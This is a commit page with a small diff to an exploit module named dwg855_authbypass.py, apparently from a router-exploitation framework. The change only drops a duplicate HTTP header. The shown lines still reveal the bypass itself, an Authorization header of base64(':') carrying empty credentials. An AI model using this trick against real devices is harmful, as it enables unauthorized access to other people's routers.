Commit f9afc4c8 by 0BuRner Committed by GitHub

Update dwg855_authbypass.py

parent ccfa2dcb
...@@ -65,8 +65,7 @@ class Exploit(exploits.Exploit): ...@@ -65,8 +65,7 @@ class Exploit(exploits.Exploit):
'Connection': 'keep-alive', 'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate', 'Accept-Encoding': 'gzip, deflate',
'Authorization': 'Og==', # this is base64(":") 'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache', 'Cache-Control': 'no-cache'}
'Connection': 'close'}
response = http_request(method="GET", url=url, headers=headers) response = http_request(method="GET", url=url, headers=headers)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment